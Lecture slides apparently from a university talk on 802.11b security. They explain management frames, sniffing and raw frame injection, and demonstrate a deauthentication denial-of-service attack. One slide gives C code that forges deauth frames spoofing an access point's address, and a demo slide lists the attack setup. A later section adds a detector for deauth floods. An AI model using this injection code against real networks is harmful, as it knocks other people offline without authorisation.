802.11 Attack Demo Haobo Zhou (hzhou@liacs.nl) L I A C S http://www.liacs.nl/home/hzhou
What Will Be Covered • Overview of 802.11b • Wireless network sniffer • Frame Injection • Deauth/Disassociation Attack • Attack Demo
NO!! Thanks OK !! Dinner??
Overview of 802.11b • ISO OSI Model and 802.11b (figure obtained from http://alpha.fdu.edu/~kanoksri/IEEE80211b.html)
Overview of 802.11b • Runs over 2.4 GHz • DSSS - Direct Sequence Spread Spectrum • Channels • FCC (US) - 11 Channels (1-11) • ETSI (EU) - 13 Channels (1-13) • France - 4 Channels (10-13) • Japan - 14 Channels (1-14) • Uses CSMA/CA
Overview of 802.11b • Uses WEP for Encryption • “Wired Equivalent Privacy” • Uses RC4 • 40-bit or 104-bit static key with 24-bit IV
Overview of 802.11b • Consists of 3 main protocol types • Management • Control • Data
Overview of 802.11b • Ad Hoc
Overview of 802.11b • Infrastructure
Overview of 802.11b • Exchange between Node and Access Point • Beacon • Authentication Req • Authentication Resp • Association Req • Association Resp • Access Point Accepts Node • Node is Associated
Wireless network sniffer • Wireless network detection • NIC with monitor mode support • Why? • Management frames • Frames belonging to others • Tools • Kismet • others
Wireless network sniffer • Network Interface Card Mode • Managed (Infrastructure) • Ad-Hoc (Ad Hoc) • Monitor (Hardware support??) • Master (acts as an AP)
Wireless network sniffer • KISMET • An 802.11 layer 2 wireless network sniffer • Runs on Linux • Ethereal/Tcpdump compatible data logging • Over 20 supported card types • Open source code
Frame Injection • NIC • support ? • Device Driver • support frame injection? • Yes- very good • NO- Change it! • User program
Frame Injection • User program • C code on Linux • RAW socket programming • Use the PF_PACKET interface to access the link layer • sd=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
Deauthentication Attack • Management frames can control link characteristics and physical medium properties • 802.11b management frames are NOT authenticated • Why is this bad?
Deauthentication Attack • Denial of Service – De-authentication • Use MAC address of Access Point • Send deauthenticate frames • Send continuously • Users are unable to reassociate with AP
Deauthentication Attack • State diagram • STATE 1: Unauthenticated, Unassociated • STATE 2: Authenticated, Unassociated • STATE 3: Authenticated, Associated • Successful authentication: State 1 to State 2 • Successful Association: State 2 to State 3 • Disassociation: State 3 to State 2 • Deauthentication: State 2 or State 3 back to State 1
Deauthentication Attack • Deauth frame structure • Attacker must spoof AP MAC address in Src Addr and BSSID • Sequence Control field handled by firmware (not set by attacker)
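Deauthentication Attack

    /* struct a3_80211, FC_TYPE_MGT and MGT_DEAUTH come from the author's
       headers, which are not shown on the slide. */
    void send_deauth(__u8 *dst, __u8 *bssid)
    {
        struct {
            struct a3_80211 hdr;   /* 802.11 management header */
            __u16 reason;          /* reason code */
        } mgt_frame;

        memset(&mgt_frame, 0, sizeof(mgt_frame));
        mgt_frame.hdr.mh_type = FC_TYPE_MGT;
        mgt_frame.hdr.mh_subtype = MGT_DEAUTH;
        memcpy(&(mgt_frame.hdr.mh_mac1), dst, 6);    /* Addr1: destination */
        memcpy(&(mgt_frame.hdr.mh_mac2), bssid, 6);  /* Addr2: source, set to the AP's address */
        memcpy(&(mgt_frame.hdr.mh_mac3), bssid, 6);  /* Addr3: BSSID */
        mgt_frame.reason = 2;
        send(sd, &mgt_frame, sizeof(mgt_frame), 0);  /* sd: the PF_PACKET raw socket */
    }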
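The monitoring-side counterpart to the slides above, added here as an example and not part of the original deck: it parses deauthentication/disassociation frames from raw 802.11 bytes and flags a burst that names a monitored BSSID. The window, threshold, struct and function names and the sample frame are assumptions constructed for illustration; frames are assumed to arrive with any radiotap or capture header already stripped.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MGMT_HDR_LEN 24  /* FC(2) Dur(2) Addr1(6) Addr2(6) Addr3(6) SeqCtl(2) */
#define ST_DISASSOC  10
#define ST_DEAUTH    12
#define WINDOW_SEC   1.0 /* assumed window; tune per site */
#define THRESHOLD    5   /* assumed frames-per-window alert level */

struct deauth_info { uint8_t dst[6], src[6], bssid[6]; uint16_t seq, reason; };
struct flood_state { uint8_t bssid[6]; double win_start; int count; };

/* Parse a raw 802.11 frame; returns 0 for deauth/disassoc, -1 for anything else. */
int parse_deauth(const uint8_t *f, size_t len, struct deauth_info *o)
{
    if (len < MGMT_HDR_LEN + 2) return -1;   /* header plus 2-byte reason code */
    int type = (f[0] >> 2) & 0x3, subtype = (f[0] >> 4) & 0xf;
    if (type != 0 || (subtype != ST_DEAUTH && subtype != ST_DISASSOC)) return -1;
    memcpy(o->dst, f + 4, 6);
    memcpy(o->src, f + 10, 6);
    memcpy(o->bssid, f + 16, 6);
    o->seq = (uint16_t)((f[22] | (f[23] << 8)) >> 4);  /* drop 4-bit fragment number */
    o->reason = (uint16_t)(f[24] | (f[25] << 8));
    return 0;
}

/* Returns 1 once more than THRESHOLD matching frames fall inside one window. */
int flood_observe(struct flood_state *st, const uint8_t *f, size_t len, double ts)
{
    struct deauth_info di;
    if (parse_deauth(f, len, &di) != 0 || memcmp(di.bssid, st->bssid, 6) != 0) return 0;
    if (ts - st->win_start > WINDOW_SEC) { st->win_start = ts; st->count = 0; }
    return ++st->count > THRESHOLD;
}

/* Constructed sample: deauth, dst 02:00:00:00:00:01, src/BSSID 00:11:22:33:44:55, seq 7, reason 2 */
static const uint8_t SAMPLE_DEAUTH[26] = {
    0xc0, 0x00, 0x00, 0x00,  0x02, 0x00, 0x00, 0x00, 0x00, 0x01,
    0x00, 0x11, 0x22, 0x33, 0x44, 0x55,  0x00, 0x11, 0x22, 0x33, 0x44, 0x55,
    0x70, 0x00,  0x02, 0x00 };

int main(void)
{
    struct flood_state st = { {0x00, 0x11, 0x22, 0x33, 0x44, 0x55}, 0.0, 0 };
    for (int i = 0; i < 8; i++)   /* eight constructed frames, 0.1 s apart */
        if (flood_observe(&st, SAMPLE_DEAUTH, sizeof SAMPLE_DEAUTH, 10.0 + 0.1 * i))
            printf("t=%.1f s: deauth burst for monitored BSSID\n", 10.0 + 0.1 * i);
    return 0;
}
```

Because the Sequence Control field is filled in by firmware, the parsed seq value of a spoofed frame often does not continue the real access point's numbering, so comparing it against the AP's recent beacons gives a second signal alongside the rate check.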
Questions? • Deauth-attack demo continues
802.11 Deauth-attack DEMO • Attacker • Hardware • Laptop • Wireless card • Atheros 5212 chip • monitor mode support • Software • Device Driver • Madwifi open source project • Two patches to enable frame injection • User program • Fata_jace.c • Victim • Hardware • Laptop • Wireless card • Software • Ping • Use ping to make sure the connection
Thanks • Xu Li • Wei Wang • Google